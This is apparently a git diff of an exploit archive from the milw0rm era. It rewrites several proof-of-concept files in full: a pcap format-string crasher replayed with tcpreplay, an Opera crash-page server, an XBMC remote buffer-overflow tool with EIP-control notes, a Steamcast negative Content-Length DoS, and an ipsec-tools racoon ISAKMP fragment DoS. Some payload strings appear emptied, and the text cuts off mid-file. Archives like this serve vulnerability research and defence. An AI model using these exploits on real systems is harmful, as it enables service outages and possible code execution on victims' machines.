+"\x00\x00\x00\x80\xc8\x38\xa4\x8b\x00\x02\xe3\x17\xc7\x50\x81\x00\x00\x00\x88\x92\xfe\xfd\x04\x01"
+"\x01\x00\x00\x01\x00\x00\x00\x10\x05\x04\x00\x03\x02\x02\x00\x00\x05\x04\x00\x03\x05\x02\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+int main(){
+FILE *fh;
+int r;
+fh=fopen("formatstringbug.pcap","wb");
+if(!fh){perror("no open");exit(1);}
+fwrite(sploit,sizeof sploit,1,fh);
+fclose(fh);
+r=system("tcpreplay -i eth0 formatstringbug.pcap");
+return 0;
+}
+
+// milw0rm.com [2009-03-30]
diff --git a/platforms/multiple/dos/8320.py b/platforms/multiple/dos/8320.py
index a84f2225a..b008aa5dd 100755
--- a/platforms/multiple/dos/8320.py
+++ b/platforms/multiple/dos/8320.py
@@ -1,65 +1,64 @@ - -# -# Author : Ahmed Obied (ahmed.obied@gmail.com) -# -# - Similar to the bug found by Wojciech Pawlikowski for Firefox -# -> http://www.milw0rm.com/exploits/8306 -# -# - Tested using the latest version of Opera (9.64) -# -# Usage : python opera.py [port] -# - -import sys, socket -from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler - -class RequestHandler(BaseHTTPRequestHandler): - - def get_exploit(self): - exploit = '' * 7400 - exploit = '' + exploit + '' - return exploit - - def log_request(self, *args, **kwargs): - pass - - def do_GET(self): - if self.path == '/': - print - print '[-] Incoming connection from %s' % self.client_address[0] - print '[-] Sending header to %s ...' % self.client_address[0] - self.send_response(200) - self.send_header('Content-type', 'text/xml') - self.end_headers() - print '[-] Header sent to %s' % self.client_address[0] - print '[-] Sending exploit to %s ...' % self.client_address[0] - self.wfile.write(self.get_exploit()) - print '[-] Exploit sent to %s' % self.client_address[0] - -def main(): - if len(sys.argv) != 2: - print 'Usage: %s [port]' % sys.argv[0] - sys.exit(1) - try: - port = int(sys.argv[1]) - if port < 1 or port > 65535: - raise ValueError - try: - serv = HTTPServer(('', port), RequestHandler) - ip = socket.gethostbyname(socket.gethostname()) - print '[-] Web server is running at http://%s:%d/' % (ip, port) - try: - serv.serve_forever() - except KeyboardInterrupt: - print '[-] Exiting ...' - except socket.error: - print '[*] ERROR: a socket error has occurred ...' - sys.exit(-1) - except ValueError: - print '[*] ERROR: invalid port number ...' 
- sys.exit(-1) - -if __name__ == '__main__': - main() - -# milw0rm.com [2009-03-30] +# +# Author : Ahmed Obied (ahmed.obied@gmail.com) +# +# - Similar to the bug found by Wojciech Pawlikowski for Firefox +# -> http://www.milw0rm.com/exploits/8306 +# +# - Tested using the latest version of Opera (9.64) +# +# Usage : python opera.py [port] +# + +import sys, socket +from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler + +class RequestHandler(BaseHTTPRequestHandler): + + def get_exploit(self): + exploit = '' * 7400 + exploit = '' + exploit + '' + return exploit + + def log_request(self, *args, **kwargs): + pass + + def do_GET(self): + if self.path == '/': + print + print '[-] Incoming connection from %s' % self.client_address[0] + print '[-] Sending header to %s ...' % self.client_address[0] + self.send_response(200) + self.send_header('Content-type', 'text/xml') + self.end_headers() + print '[-] Header sent to %s' % self.client_address[0] + print '[-] Sending exploit to %s ...' % self.client_address[0] + self.wfile.write(self.get_exploit()) + print '[-] Exploit sent to %s' % self.client_address[0] + +def main(): + if len(sys.argv) != 2: + print 'Usage: %s [port]' % sys.argv[0] + sys.exit(1) + try: + port = int(sys.argv[1]) + if port < 1 or port > 65535: + raise ValueError + try: + serv = HTTPServer(('', port), RequestHandler) + ip = socket.gethostbyname(socket.gethostname()) + print '[-] Web server is running at http://%s:%d/' % (ip, port) + try: + serv.serve_forever() + except KeyboardInterrupt: + print '[-] Exiting ...' + except socket.error: + print '[*] ERROR: a socket error has occurred ...' + sys.exit(-1) + except ValueError: + print '[*] ERROR: invalid port number ...' + sys.exit(-1) + +if __name__ == '__main__': + main() + +# milw0rm.com [2009-03-30] diff --git a/platforms/multiple/dos/8337.c b/platforms/multiple/dos/8337.c index 430e53eca..39c55b029 100755 --- a/platforms/multiple/dos/8337.c +++ b/platforms/multiple/dos/8337.c 
@@ -1,379 +1,379 @@ -/* -XBMC multiple remote buffer overflow vulnerabilities. - -XBMC is an award winning media center application for -Linux, Mac OS X, Windows and XBox. The ultimate hub -for all your media, XBMC is easy to use, looks slick, -and has a large helpful community.XBMC has won many -awards. - -Affected version: XBMC 8.10 Atlantis -Tested on: Windows xpsp3 and linux unbuntu 8.10 -Venders web site : http://xbmc.org/ -Release date:April the 1st 2009 - -Credits go to n00b for finding the buffer overflow -and writing simple yet effective poc code. -Shout's to every one that knows me and have helped over -the years. - -Please if u do wish to write a exploit for the buffer -overflow please give credits. -also you will have to filter the bad chars from -shellcode if you do wish to write exploit for the -voulnrabilitys in this advisory. - ----------- -Disclaimer ----------- -The information in this advisory and any of its -demonstrations is provided "as is" without any -warranty of any kind. - -I am not liable for any direct or indirect damages -caused as a result of using the information or -demonstrations provided in any part of this advisory. -Educational use only..!! - -You can call by my blog to leave comments and feed back -and ask any questions you would like.Should be up -and runing in a few days. - -[--] -http://n00b-n00b.blogspot.com/ -[--] - -This poc code was writen on linux using gcc-4.* to compile. -*/ - -#include -#include -#include -#include -#include -#include -#include - -/*Just enough recived buffer to allow for the server banner!!*/ - -#define BUFFSIZE 32 - - -void error(char *mess) -{ - perror(mess); - exit(1); -} - -int main(int argc, char *argv[]) -{ - int sock; - int input; - struct sockaddr_in http_client; - char buffer[BUFFSIZE]; - - /*You may need to add more buffer on linux versions!! 
- on windows its <1010> bytes to own eip next 4 bytes - are loaded into the $esp register.*/ - char buffer1[1500]; - - unsigned int http_len; - int received = 0; - - /* If there is more than 2 arguments passed print usage!!*/ - if (argc != 3) - { - fprintf(stderr,"USAGE: Server_ip port\n"); - exit(1); - } - - /* Create socket */ - if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) - { - error("Cant create socket"); - } - - - /* Construct sockaddr */ - memset(&http_client, 0, sizeof(http_client)); - http_client.sin_family = AF_INET; - http_client.sin_addr.s_addr = inet_addr(argv[1]); - http_client.sin_port = htons(atoi(argv[2])); - - /* Establish connection */ - if (connect(sock, - (struct sockaddr *) &http_client, - sizeof(http_client)) < 0) - { - error("Failed to connect with remote host"); - } - - /*We need to Construct all the voulnrable request togeather*/ - memset( buffer1, 0x41, sizeof(buffer1) - 1 ); - - printf( "----------------------------------------------------------------\n" ); - printf( "XBMC remote buffer overflow poc code by n00b !!\n" ); - printf( "----------------------------------------------------------------\n" ); - printf( "[1]. Get request buffer overflow poc !!\n" ); - printf( "[2]. Get /xbmcHttp?command=takescreenshot buffer overflow !!\n" ); - printf( "[3]. Get /xbmcHttp?command=GetTagFromFilename buffer overflow !!\n" ); - printf( "[4]. queryvideodatabase possible format string poc !!\n" ); - printf( "----------------------------------------------------------------\n" ); - printf( "----------------------------------------------------------------\n" ); - printf( "[5]. 
Cancel and quit application !!\n" ); - printf( "----------------------\n" ); - printf( "Pick your http request: " ); - scanf( "%d", &input ); - switch ( input ) - { - case 1: - memcpy ( buffer1, "GET /", 5); - memcpy ( buffer1 +(sizeof(buffer1) - 1) - 21, ".asp HTTP/1.1\r\n\r\n", 21); - break; - case 2: - memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=takescreenshot(", 46); - memcpy ( buffer1 +(sizeof(buffer1) - 1) - 41, ".jpg;false;0;300;200;90) HTTP/1.1\r\n\r\n", 41); - break; - case 3: - memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/", 53); - memcpy ( buffer1 +(sizeof(buffer1) - 1) - 23, ".mp3) HTTP/1.1\r\n\r\n", 23); - break; - case 4: - memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) HTTP/1.1\r\n\r\n", 76); - break; - case 5: - exit(0); - break; - } - - - /* Send our get request to the server*/ - http_len = strlen(buffer1); - if (send(sock, buffer1, http_len, 0) != http_len) - { - error("No byte's where sent to remote host check Get request !!"); - } - - - /* Receive the current state of the server*/ - fprintf(stdout, "Received: "); - while (received < http_len) - { - int bytes = 0; - if ((bytes = recv(sock, buffer, BUFFSIZE-1, 0)) < 1) - { - error("Was the banner received?? if no banner exploit was successfull!!"); - } - received += bytes; - buffer[bytes] = '\0'; - fprintf(stdout, buffer); - } - - fprintf(stdout, "\n"); - close(sock); - exit(0); -} - - -/* -A basic run down of the bugs found with a basic discription.!! - - -(1)..(Get request WebsHomePageHandler buffer overflow).. - -I was able to track down most of the vulnerable code.All this info -was collected on a window's system. - -The first buffer overflow i found in the xbmc application all is -required was for me to make a simple get request by adding 1033 bytes -of user supplied data to the request.We are now able to gain control of the -$eip register and the next four bytes on the stack is where our $esp register -is pointing. 
- - ---snip-- - - -Source of WebsHomePageHandler..\XBMC\xbmc\lib\libGoAhead\WebServer.cpp - - - - - Home page handler - -static int websHomePageHandler(webs_t wp, char_t *urlPrefix, char_t *webDir, -int arg, char_t *url, char_t *path, char_t *query) -{ - - If the empty or "/" URL is invoked, redirect default URLs to the home page - - char dir[1024]; - char files[][20] = { - {"index.html"}, - {"index.htm"}, - {"home.htm"}, - {"home.html"}, - {"default.asp"}, - {"home.asp"}, - {'\0' } - }; - - - - - strcpy(dir, websGetDefaultDir()); - strcat(dir, path); - for(u_int pos = 0; pos < strlen(dir); pos++) -if (dir[pos] == '/') dir[pos] = '\\'; - -DWORD attributes = GetFileAttributes(dir); -if (FILE_ATTRIBUTE_DIRECTORY == attributes) -{ -int i = 0; -char buf[1024]; -while (files[i][0]) -{ -strcpy(buf, dir); -if (buf[strlen(buf)-1] != '\\') strcat(buf, "\\"); -strcat(buf, files[i]); - -if (!access(buf, 0)) -{ -strcpy(buf, path); -if (path[strlen(path)-1] != '/') strcat(buf, "/"); -strcat(buf, files[i]); -websRedirect(wp, buf); -return 1; -} -i++; -} - - ---snip-- - - -the next set of voulnrabilitys are exploited through -the "Web Server HTTP API". -more information can be read at the following link. -I wrote a simple fuzzer and fuzzed all the commands that -where passed through the http requests. - - -http://xbmc.org/wiki/?title=WebServerHTTP-API - - -(2)..(takescreenshot remote buffer overflow).. - -please visit the above link for more information -on specific command's.This is also a classic buffer -overflow where we can add a long file name to the -takescreenshot command and pass it to the API. -once again we can over flow the static allocated -buffer on the stack and let us own the application -flow.Thus letting us execute our own supplied data. -Also as a side note to this buffer overflow -there are different registers over wrote. 
- -...\XBMC\xbmc\cores\DllLoader\exports\emu_msvcrt.cpp - ---snip-- - - -int dll_open(const char* szFileName, int iMode) - { - char str[XBMC_MAX_PATH]; - - // move to CFile classes - if (strncmp(szFileName, "\\Device\\Cdrom0", 14) == 0) - { - // replace "\\Device\\Cdrom0" with "D:" - strcpy(str, "D:"); - strcat(str, szFileName + 14); - } - else strcpy(str, szFileName); - - CFile* pFile = new CFile(); - bool bBinary = false; - if (iMode & O_BINARY) - bBinary = true; - bool bWrite = false; - if ((iMode & O_RDWR) || (iMode & O_WRONLY)) - bWrite = true; - bool bOverwrite=false; - if ((iMode & _O_TRUNC) || (iMode & O_CREAT)) - bOverwrite = true; - // currently always overwrites - bool bResult; - if (bWrite) - bResult = pFile->OpenForWrite(_P(str), bBinary, bOverwrite); - else - bResult = pFile->Open(_P(str), bBinary); - if (bResult) - { - EmuFileObject* object = g_emuFileWrapper.RegisterFileObject(pFile); - if (object == NULL) - { - VERIFY(0); - pFile->Close(); - delete pFile; - return -1; - } - return g_emuFileWrapper.GetDescriptorByStream(&object->file_emu); - } - delete pFile; - return -1; - } - ---snip-- - -We also know that szFileName is defind in a headerfile with -1024 bytes staticaly allocated.So if we passs more the 1024 byte's we can cause -stack corruption and over write the $eip also give's us a choice of registers -we can use for our shell code. - - - -(3)..(GetTagFromFilename remote buffer overflow).. - -The buffer over flow is when parsing a id3 tag -the difference is the registers that are over wrote -at the time of access violation are as follow's.Im not -going to list all the source for all the exceptions. -This poc is big enough already with out adding more -information and its simple to set up XBMC and compile -on your own machine.. - - - -(4)..(Sqlite queryvideodatabase).. - -Just results in denial of service no more information available -maybe ill look more into sqllite3 in the future. 
- -[--] -/xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) -[--] - -All the above vulnerability's where tested on linux and windows -On linux unbuntu 8.10 using strace to debug.And on windows -i used visual c++ express 2008.This poc code is just a simple -poc code to show the vulnerability's i found within the XBMC -application. - -it started off as closed source analysis.Although -the application was tested there are still a lot of other -possibility for exploitation.Even the login for the web server -could be vulnerable to a buffer overflow. - -Also worth a mention is i could take controll over the XBMC -web server and there would be no error messages or any thing to -sugest that the server had been took offline but it carrys on as -normal the rest of xbmc stays the same with out any changes. -It looks like it just terminates the thread and leaving the -rest of the application intact and continues to run -like normal. - - -*/ - -// milw0rm.com [2009-04-01] +/* +XBMC multiple remote buffer overflow vulnerabilities. + +XBMC is an award winning media center application for +Linux, Mac OS X, Windows and XBox. The ultimate hub +for all your media, XBMC is easy to use, looks slick, +and has a large helpful community.XBMC has won many +awards. + +Affected version: XBMC 8.10 Atlantis +Tested on: Windows xpsp3 and linux unbuntu 8.10 +Venders web site : http://xbmc.org/ +Release date:April the 1st 2009 + +Credits go to n00b for finding the buffer overflow +and writing simple yet effective poc code. +Shout's to every one that knows me and have helped over +the years. + +Please if u do wish to write a exploit for the buffer +overflow please give credits. +also you will have to filter the bad chars from +shellcode if you do wish to write exploit for the +voulnrabilitys in this advisory. + +---------- +Disclaimer +---------- +The information in this advisory and any of its +demonstrations is provided "as is" without any +warranty of any kind. 
+ +I am not liable for any direct or indirect damages +caused as a result of using the information or +demonstrations provided in any part of this advisory. +Educational use only..!! + +You can call by my blog to leave comments and feed back +and ask any questions you would like.Should be up +and runing in a few days. + +[--] +http://n00b-n00b.blogspot.com/ +[--] + +This poc code was writen on linux using gcc-4.* to compile. +*/ + +#include +#include +#include +#include +#include +#include +#include + +/*Just enough recived buffer to allow for the server banner!!*/ + +#define BUFFSIZE 32 + + +void error(char *mess) +{ + perror(mess); + exit(1); +} + +int main(int argc, char *argv[]) +{ + int sock; + int input; + struct sockaddr_in http_client; + char buffer[BUFFSIZE]; + + /*You may need to add more buffer on linux versions!! + on windows its <1010> bytes to own eip next 4 bytes + are loaded into the $esp register.*/ + char buffer1[1500]; + + unsigned int http_len; + int received = 0; + + /* If there is more than 2 arguments passed print usage!!*/ + if (argc != 3) + { + fprintf(stderr,"USAGE: Server_ip port\n"); + exit(1); + } + + /* Create socket */ + if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) + { + error("Cant create socket"); + } + + + /* Construct sockaddr */ + memset(&http_client, 0, sizeof(http_client)); + http_client.sin_family = AF_INET; + http_client.sin_addr.s_addr = inet_addr(argv[1]); + http_client.sin_port = htons(atoi(argv[2])); + + /* Establish connection */ + if (connect(sock, + (struct sockaddr *) &http_client, + sizeof(http_client)) < 0) + { + error("Failed to connect with remote host"); + } + + /*We need to Construct all the voulnrable request togeather*/ + memset( buffer1, 0x41, sizeof(buffer1) - 1 ); + + printf( "----------------------------------------------------------------\n" ); + printf( "XBMC remote buffer overflow poc code by n00b !!\n" ); + printf( "----------------------------------------------------------------\n" ); + 
printf( "[1]. Get request buffer overflow poc !!\n" ); + printf( "[2]. Get /xbmcHttp?command=takescreenshot buffer overflow !!\n" ); + printf( "[3]. Get /xbmcHttp?command=GetTagFromFilename buffer overflow !!\n" ); + printf( "[4]. queryvideodatabase possible format string poc !!\n" ); + printf( "----------------------------------------------------------------\n" ); + printf( "----------------------------------------------------------------\n" ); + printf( "[5]. Cancel and quit application !!\n" ); + printf( "----------------------\n" ); + printf( "Pick your http request: " ); + scanf( "%d", &input ); + switch ( input ) + { + case 1: + memcpy ( buffer1, "GET /", 5); + memcpy ( buffer1 +(sizeof(buffer1) - 1) - 21, ".asp HTTP/1.1\r\n\r\n", 21); + break; + case 2: + memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=takescreenshot(", 46); + memcpy ( buffer1 +(sizeof(buffer1) - 1) - 41, ".jpg;false;0;300;200;90) HTTP/1.1\r\n\r\n", 41); + break; + case 3: + memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/", 53); + memcpy ( buffer1 +(sizeof(buffer1) - 1) - 23, ".mp3) HTTP/1.1\r\n\r\n", 23); + break; + case 4: + memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) HTTP/1.1\r\n\r\n", 76); + break; + case 5: + exit(0); + break; + } + + + /* Send our get request to the server*/ + http_len = strlen(buffer1); + if (send(sock, buffer1, http_len, 0) != http_len) + { + error("No byte's where sent to remote host check Get request !!"); + } + + + /* Receive the current state of the server*/ + fprintf(stdout, "Received: "); + while (received < http_len) + { + int bytes = 0; + if ((bytes = recv(sock, buffer, BUFFSIZE-1, 0)) < 1) + { + error("Was the banner received?? if no banner exploit was successfull!!"); + } + received += bytes; + buffer[bytes] = '\0'; + fprintf(stdout, buffer); + } + + fprintf(stdout, "\n"); + close(sock); + exit(0); +} + + +/* +A basic run down of the bugs found with a basic discription.!! 
+ + +(1)..(Get request WebsHomePageHandler buffer overflow).. + +I was able to track down most of the vulnerable code.All this info +was collected on a window's system. + +The first buffer overflow i found in the xbmc application all is +required was for me to make a simple get request by adding 1033 bytes +of user supplied data to the request.We are now able to gain control of the +$eip register and the next four bytes on the stack is where our $esp register +is pointing. + + +--snip-- + + +Source of WebsHomePageHandler..\XBMC\xbmc\lib\libGoAhead\WebServer.cpp + + + + + Home page handler + +static int websHomePageHandler(webs_t wp, char_t *urlPrefix, char_t *webDir, +int arg, char_t *url, char_t *path, char_t *query) +{ + + If the empty or "/" URL is invoked, redirect default URLs to the home page + + char dir[1024]; + char files[][20] = { + {"index.html"}, + {"index.htm"}, + {"home.htm"}, + {"home.html"}, + {"default.asp"}, + {"home.asp"}, + {'\0' } + }; + + + + + strcpy(dir, websGetDefaultDir()); + strcat(dir, path); + for(u_int pos = 0; pos < strlen(dir); pos++) +if (dir[pos] == '/') dir[pos] = '\\'; + +DWORD attributes = GetFileAttributes(dir); +if (FILE_ATTRIBUTE_DIRECTORY == attributes) +{ +int i = 0; +char buf[1024]; +while (files[i][0]) +{ +strcpy(buf, dir); +if (buf[strlen(buf)-1] != '\\') strcat(buf, "\\"); +strcat(buf, files[i]); + +if (!access(buf, 0)) +{ +strcpy(buf, path); +if (path[strlen(path)-1] != '/') strcat(buf, "/"); +strcat(buf, files[i]); +websRedirect(wp, buf); +return 1; +} +i++; +} + + +--snip-- + + +the next set of voulnrabilitys are exploited through +the "Web Server HTTP API". +more information can be read at the following link. +I wrote a simple fuzzer and fuzzed all the commands that +where passed through the http requests. + + +http://xbmc.org/wiki/?title=WebServerHTTP-API + + +(2)..(takescreenshot remote buffer overflow).. 
+ +please visit the above link for more information +on specific command's.This is also a classic buffer +overflow where we can add a long file name to the +takescreenshot command and pass it to the API. +once again we can over flow the static allocated +buffer on the stack and let us own the application +flow.Thus letting us execute our own supplied data. +Also as a side note to this buffer overflow +there are different registers over wrote. + +...\XBMC\xbmc\cores\DllLoader\exports\emu_msvcrt.cpp + +--snip-- + + +int dll_open(const char* szFileName, int iMode) + { + char str[XBMC_MAX_PATH]; + + // move to CFile classes + if (strncmp(szFileName, "\\Device\\Cdrom0", 14) == 0) + { + // replace "\\Device\\Cdrom0" with "D:" + strcpy(str, "D:"); + strcat(str, szFileName + 14); + } + else strcpy(str, szFileName); + + CFile* pFile = new CFile(); + bool bBinary = false; + if (iMode & O_BINARY) + bBinary = true; + bool bWrite = false; + if ((iMode & O_RDWR) || (iMode & O_WRONLY)) + bWrite = true; + bool bOverwrite=false; + if ((iMode & _O_TRUNC) || (iMode & O_CREAT)) + bOverwrite = true; + // currently always overwrites + bool bResult; + if (bWrite) + bResult = pFile->OpenForWrite(_P(str), bBinary, bOverwrite); + else + bResult = pFile->Open(_P(str), bBinary); + if (bResult) + { + EmuFileObject* object = g_emuFileWrapper.RegisterFileObject(pFile); + if (object == NULL) + { + VERIFY(0); + pFile->Close(); + delete pFile; + return -1; + } + return g_emuFileWrapper.GetDescriptorByStream(&object->file_emu); + } + delete pFile; + return -1; + } + +--snip-- + +We also know that szFileName is defind in a headerfile with +1024 bytes staticaly allocated.So if we passs more the 1024 byte's we can cause +stack corruption and over write the $eip also give's us a choice of registers +we can use for our shell code. + + + +(3)..(GetTagFromFilename remote buffer overflow).. 
+ +The buffer over flow is when parsing a id3 tag +the difference is the registers that are over wrote +at the time of access violation are as follow's.Im not +going to list all the source for all the exceptions. +This poc is big enough already with out adding more +information and its simple to set up XBMC and compile +on your own machine.. + + + +(4)..(Sqlite queryvideodatabase).. + +Just results in denial of service no more information available +maybe ill look more into sqllite3 in the future. + +[--] +/xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) +[--] + +All the above vulnerability's where tested on linux and windows +On linux unbuntu 8.10 using strace to debug.And on windows +i used visual c++ express 2008.This poc code is just a simple +poc code to show the vulnerability's i found within the XBMC +application. + +it started off as closed source analysis.Although +the application was tested there are still a lot of other +possibility for exploitation.Even the login for the web server +could be vulnerable to a buffer overflow. + +Also worth a mention is i could take controll over the XBMC +web server and there would be no error messages or any thing to +sugest that the server had been took offline but it carrys on as +normal the rest of xbmc stays the same with out any changes. +It looks like it just terminates the thread and leaving the +rest of the application intact and continues to run +like normal. + + +*/ + +// milw0rm.com [2009-04-01] diff --git a/platforms/multiple/dos/838.pl b/platforms/multiple/dos/838.pl index 7e65cc687..9ea746f75 100755 --- a/platforms/multiple/dos/838.pl +++ b/platforms/multiple/dos/838.pl @@ -54,6 +54,6 @@ print $socket2 "GET HTTP/1.0\r\n"; close($socket2); print "Attack finished ;)\n"; -exit(); - -# milw0rm.com [2005-02-24] +exit(); + +# milw0rm.com [2005-02-24] diff --git a/platforms/multiple/dos/8429.pl b/platforms/multiple/dos/8429.pl index d9d43cdfc..7752b679d 100755 --- a/platforms/multiple/dos/8429.pl 
+++ b/platforms/multiple/dos/8429.pl @@ -1,25 +1,25 @@ -#!/usr/bin/perl -#Steamcast 0.9.75 beta Remote Denial of Service -#Download :http://www.steamcast.com -#Tested Under Windows XP and linux -#Dork for test :"Powered By Steamcast "0.9.75 beta -#Author: ksa04 -use strict; -use warnings; -use IO::Socket; - -my $host = shift || die "usage: perl $0 host port\n"; -my $port = shift ; - -my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp') -or die "error: $!\n"; - -$sock->send("POST / HTTP/1.1\r\n"); -$sock->send("Content-Length: -100\r\n\r\n"); - - -$sock->close; - -print "[+]Done...\n"; - -# milw0rm.com [2009-04-14] +#!/usr/bin/perl +#Steamcast 0.9.75 beta Remote Denial of Service +#Download :http://www.steamcast.com +#Tested Under Windows XP and linux +#Dork for test :"Powered By Steamcast "0.9.75 beta +#Author: ksa04 +use strict; +use warnings; +use IO::Socket; + +my $host = shift || die "usage: perl $0 host port\n"; +my $port = shift ; + +my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp') +or die "error: $!\n"; + +$sock->send("POST / HTTP/1.1\r\n"); +$sock->send("Content-Length: -100\r\n\r\n"); + + +$sock->close; + +print "[+]Done...\n"; + +# milw0rm.com [2009-04-14] diff --git a/platforms/multiple/dos/855.pl b/platforms/multiple/dos/855.pl index 0040ddf1a..ec2ecd63d 100755 --- a/platforms/multiple/dos/855.pl +++ b/platforms/multiple/dos/855.pl @@ -107,6 +107,6 @@ print "> \n"; close($s); -print " <+> Ok now target web server maybe DoSeD.\n"; - -# milw0rm.com [2005-03-04] +print " <+> Ok now target web server maybe DoSeD.\n"; + +# milw0rm.com [2005-03-04] diff --git a/platforms/multiple/dos/8646.php b/platforms/multiple/dos/8646.php index 81ddd322c..0d609cd8c 100755 --- a/platforms/multiple/dos/8646.php +++ b/platforms/multiple/dos/8646.php @@ -1,46 +1,46 @@ - \n\n"); -} - -# milw0rm.com [2009-05-08] + \n\n"); +} + +# milw0rm.com [2009-05-08] 
diff --git a/platforms/multiple/dos/8669.c b/platforms/multiple/dos/8669.c
index 3a0591609..4d0395dab 100755
--- a/platforms/multiple/dos/8669.c
+++ b/platforms/multiple/dos/8669.c
@@ -1,142 +1,142 @@ -/* racoon-isakmp-dos.c - * - * Copyright (c) 2009 by - * - * ipsec-tools racoon frag-isakmp DoS POC - * by mu-b - Thu Apr 02 2009 - * - * - Tested on: ipsec-tools-0.7.1 - * - * - Private Source Code -DO NOT DISTRIBUTE - - * http://www.digit-labs.org/ -- Digit-Labs 2009!@$! - */ - -#include -#include - -#include -#include -#include -#include -#include - -#define DEF_PORT 500 -#define PORT_ISAKMP DEF_PORT - -#define ISAKMP_VERSION_NUMBER 0x10 -#define ISAKMP_ETYPE_BASE 1 /* Base */ - -/* Frag does not seems to be documented */ -#define ISAKMP_NPTYPE_FRAG 132 /* IKE fragmentation payload */ - -/* flags */ -#define ISAKMP_FRAG_LAST 1 - -typedef u_char cookie_t[8]; - -/* 3.1 ISAKMP Header Format */ -struct isakmp { - cookie_t i_ck; /* Initiator Cookie */ - cookie_t r_ck; /* Responder Cookie */ - unsigned char np; /* Next Payload Type */ - unsigned char v; - unsigned char etype; /* Exchange Type */ - unsigned char flags; /* Flags */ - unsigned int msgid; - unsigned int len; /* Length */ -}; - -/* IKE fragmentation payload */ -struct isakmp_frag { - unsigned short unknown0; /* always set to zero? */ - unsigned short len; - unsigned short unknown1; /* always set to 1? */ - unsigned char index; - unsigned char flags; -}; - -/* used to verify the r_ck. 
*/ -static u_char r_ck0[] = { 0,0,0,0,0,0,0,0 }; - -static void -isa_kmp_dos (char *host) -{ - char buf[sizeof (struct isakmp) + - sizeof (struct isakmp_frag)]; - struct isakmp *hdr; - struct isakmp_frag *frag; - struct sockaddr_in saddr; - struct hostent *hp; - int fd, i, len, n; - - if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1) - { - perror ("socket()"); - exit (EXIT_FAILURE); - } - - if ((hp = gethostbyname (host)) == NULL) - { - perror ("gethostbyname()"); - exit (EXIT_FAILURE); - } - - memset (&saddr, 0, sizeof saddr); - memcpy ((char *) &saddr.sin_addr, hp->h_addr, hp->h_length); - saddr.sin_family = AF_INET; - saddr.sin_port = htons (PORT_ISAKMP); - - /* formulate request */ - memset (buf, 0, sizeof (buf)); - - hdr = (struct isakmp *) buf; - frag = (struct isakmp_frag *) (hdr + 1); - - for (i = 0; i < sizeof (hdr->i_ck); i++) - hdr->i_ck[i] = (rand () % 255) + 1; - - memcpy (&hdr->r_ck, r_ck0, sizeof (hdr->r_ck)); - hdr->v = ISAKMP_VERSION_NUMBER; - hdr->flags = 0; - hdr->etype = ISAKMP_ETYPE_BASE; - hdr->msgid = 0; - hdr->np = ISAKMP_NPTYPE_FRAG; - - len = sizeof (struct isakmp) + sizeof (struct isakmp_frag); - hdr->len = htonl (len); - - frag->len = htons (sizeof (struct isakmp_frag)); - frag->index = 1; - frag->flags = ISAKMP_FRAG_LAST; - - n = sendto (fd, hdr, len, 0, (struct sockaddr *) &saddr, sizeof saddr); - if (n < 0 || n != len) - { - fprintf (stderr, "isa_kmp_dos: sendto %d != %d\n", n, len); - exit (EXIT_FAILURE); - } - - close (fd); -} - -int -main (int argc, char **argv) -{ - printf ("ipsec-tools racoon frag-isakmp DoS PoC\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n"); - - if (argc <= 1) - { - fprintf (stderr, "Usage: %s \n", argv[0]); - exit (EXIT_SUCCESS); - } - - printf ("* crashing racoon... 
"); - isa_kmp_dos (argv[1]); - printf ("done\n\n"); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2009-05-13] +/* racoon-isakmp-dos.c + * + * Copyright (c) 2009 by + * + * ipsec-tools racoon frag-isakmp DoS POC + * by mu-b - Thu Apr 02 2009 + * + * - Tested on: ipsec-tools-0.7.1 + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2009!@$! + */ + +#include +#include + +#include +#include +#include +#include +#include + +#define DEF_PORT 500 +#define PORT_ISAKMP DEF_PORT + +#define ISAKMP_VERSION_NUMBER 0x10 +#define ISAKMP_ETYPE_BASE 1 /* Base */ + +/* Frag does not seems to be documented */ +#define ISAKMP_NPTYPE_FRAG 132 /* IKE fragmentation payload */ + +/* flags */ +#define ISAKMP_FRAG_LAST 1 + +typedef u_char cookie_t[8]; + +/* 3.1 ISAKMP Header Format */ +struct isakmp { + cookie_t i_ck; /* Initiator Cookie */ + cookie_t r_ck; /* Responder Cookie */ + unsigned char np; /* Next Payload Type */ + unsigned char v; + unsigned char etype; /* Exchange Type */ + unsigned char flags; /* Flags */ + unsigned int msgid; + unsigned int len; /* Length */ +}; + +/* IKE fragmentation payload */ +struct isakmp_frag { + unsigned short unknown0; /* always set to zero? */ + unsigned short len; + unsigned short unknown1; /* always set to 1? */ + unsigned char index; + unsigned char flags; +}; + +/* used to verify the r_ck. 
